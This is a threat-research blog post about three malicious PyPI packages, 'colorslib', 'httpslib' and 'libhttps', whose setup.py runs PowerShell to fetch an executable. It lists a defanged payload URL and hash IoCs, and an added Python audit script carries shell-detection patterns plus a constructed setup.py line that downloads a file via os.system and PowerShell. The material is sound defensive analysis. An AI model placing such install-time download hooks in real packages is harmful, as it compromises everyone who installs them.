URL: https://www.fortinet.com/blog/threat-research/supply-chain-attack-using-identical-pypi-packages-colorslib-httpslib-libhttps

Threat Research


SUPPLY CHAIN ATTACK USING IDENTICAL PYPI PACKAGES, “COLORSLIB”, “HTTPSLIB”, AND “LIBHTTPS”

By Jin Lee | January 14, 2023

The FortiGuard Labs team has discovered a new 0-day attack embedded in three
PyPI (Python Package Index) packages called ‘colorslib’, ‘httpslib’, and
‘libhttps’. They were found on January 10, 2023, by monitoring an open-source
ecosystem. The Python packages ‘colorslib’ and ‘httpslib’ were published on
January 7, 2023, and ‘libhttps’ was published on January 12, 2023. All three
were published by the same author, ‘Lolip0p’, as shown in the official PyPI
repository. ‘Lolip0p’ joined the repository close to the publish date.

Figure 1: Package author information

The author gives each package a project description that looks legitimate and
clean, as shown below.

Figure 2: Project description of colorslib
Figure 3: Project description of httpslib
Figure 4: Project description of libhttps

All versions of these packages are malicious.

Figure 5: Release history of colorslib
Figure 6: Release history of httpslib
Figure 7: Release history of libhttps

Interestingly, when we look at the setup.py script for these packages, we find
they are identical.

Figure 8: setup.py from all packages

The script tries to run PowerShell with a suspicious URL that needed further analysis:

https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0

As shown in the VirusTotal entry below, the download URL serves the following
executable (SHA-256):

8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b

While this download URL has not previously been detected by any other threat
researchers, some vendors do flag the downloaded executable file as malicious.

Figure 9: This URL has not been detected by VirusTotal
Figure 10: Vendors that detect the downloaded executable Oxzy.exe

 

The downloaded executable is called ‘Oxzy.exe’. It drops another executable,
‘update.exe’, that runs in the folder ‘%USER%\AppData\Local\Temp\’.

Figure 11: Dropped file update.exe

As shown in the VirusTotal entry below, several vendors flag this executable as
malicious (SHA-256):

293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757

Figure 12: Vendors that detect the dropped executable update.exe

 

When running ‘update.exe’, it drops a series of files to the folder
‘%USER%\AppData\Local\Temp\onefile_%PID_%TIME%’.

Figure 13: update.exe running
Figure 14: Dropped files

The dropped file, ‘SearchProtocolHost.exe’, is flagged as malicious by several
vendors (SHA-256):

123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638

Figure 15: Vendors that detect SearchProtocolHost.exe


CONCLUSION

In this blog, we showed a single author posting separate Python packages that
use the same code to launch an attack. The author also positions each package as
legitimate and clean by including a convincing project description. However,
these packages download and run a malicious binary executable.

Python end users should always perform due diligence before downloading and
running any packages, especially from new authors. And as can be seen,
publishing more than one package in a short time period is no indication that an
author is reliable.

 


FORTINET PROTECTIONS

FortiGuard AntiVirus detects the malicious executables identified in this report
as follows:

Oxzy.exe: Malicious_Behavior.SB
update.exe: PossibleThreat.PALLASNET.H
SearchProtocolHost.exe: Malicious_Behavior.SB

The FortiGuard AntiVirus service is supported
by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current
AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects the download URLs cited in this
report as Malicious and blocks them.

 


IOCS

Oxzy.exe
8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b

update.exe
293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757

SearchProtocolHost.exe
123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638

Malicious URLs
https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0
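As an added example (this is not Fortinet's code, and not the actual setup.py of the three packages, which the post shows only as a screenshot), the script below performs the two checks a defender would want before installing a package like these: a static scan of setup.py for install-time process execution, shell invocations and embedded URLs, which is exactly the pattern the setup.py in Figure 8 follows, and a SHA-256 comparison against the IoCs listed above. The sample setup.py sources, the `example.invalid` URL and the `Invoke-Placeholder` token are constructed placeholders; only the three hashes and file names come from the post.

```python
"""Pre-install audit for a Python package: static setup.py scan plus IoC hash check.

Added example; this is not Fortinet's code and not the actual setup.py of the
packages described above (the post shows that file only as a screenshot).
Standard library only.
"""
import ast
import hashlib
import re
from dataclasses import dataclass

# SHA-256 IoCs listed in the post above, keyed by digest.
IOC_SHA256 = {
    "8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b": "Oxzy.exe",
    "293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757": "update.exe",
    "123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638": "SearchProtocolHost.exe",
}

# Calls that let setup.py run an external program or arbitrary code at install time.
EXEC_CALLS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output", "subprocess.Popen",
    "exec", "eval",
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
SHELL_RE = re.compile(r"powershell|cmd\.exe|/bin/sh", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line: int    # source line in setup.py
    kind: str    # "exec_call", "shell" or "url"
    detail: str  # the call name, the matched string, or the URL


def _dotted_name(node):
    """Return 'pkg.attr' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_setup_py(source: str) -> list:
    """Parse setup.py and flag process execution, shell strings and embedded URLs."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.append(Finding(node.lineno, "exec_call", name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if SHELL_RE.search(node.value):
                findings.append(Finding(node.lineno, "shell", node.value))
            for url in URL_RE.findall(node.value):
                findings.append(Finding(node.lineno, "url", url))
    return sorted(findings, key=lambda f: (f.line, f.kind))


def match_ioc(data: bytes):
    """Return the IoC label whose SHA-256 matches these bytes, or None."""
    return IOC_SHA256.get(hashlib.sha256(data).hexdigest())


# Constructed samples (not the real package content). The URL is a placeholder
# in the reserved .invalid TLD and "Invoke-Placeholder" is not a real cmdlet.
MALICIOUS_SETUP_PY = (
    "from setuptools import setup\n"
    "import os\n"
    'os.system("powershell -Command Invoke-Placeholder https://example.invalid/x.exe")\n'
    'setup(name="colorslib", version="0.0.1", description="Colorful console output")\n'
)
CLEAN_SETUP_PY = (
    "from setuptools import setup\n"
    'setup(name="colorslib", version="0.0.1", description="Colorful console output")\n'
)


if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP_PY), ("clean", CLEAN_SETUP_PY)):
        print(f"[{label}]")
        for f in scan_setup_py(src):
            print(f"  line {f.line}: {f.kind}: {f.detail}")
    print("IoC match for sample bytes:", match_ioc(b"not a real binary"))
```

Running the script on the constructed malicious sample reports three findings on the `os.system` line (the call itself, the PowerShell string, and the URL) and nothing on the clean sample; a legitimate setup.py has no reason to spawn a shell or fetch anything over HTTP during installation, so any finding of these kinds is worth a manual look before `pip install`. The hash check is deliberately exact-match only: it catches the specific binaries from this report, while the static scan catches the technique regardless of which payload the URL serves.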

 


 


Tags:

threat research, security attack, python

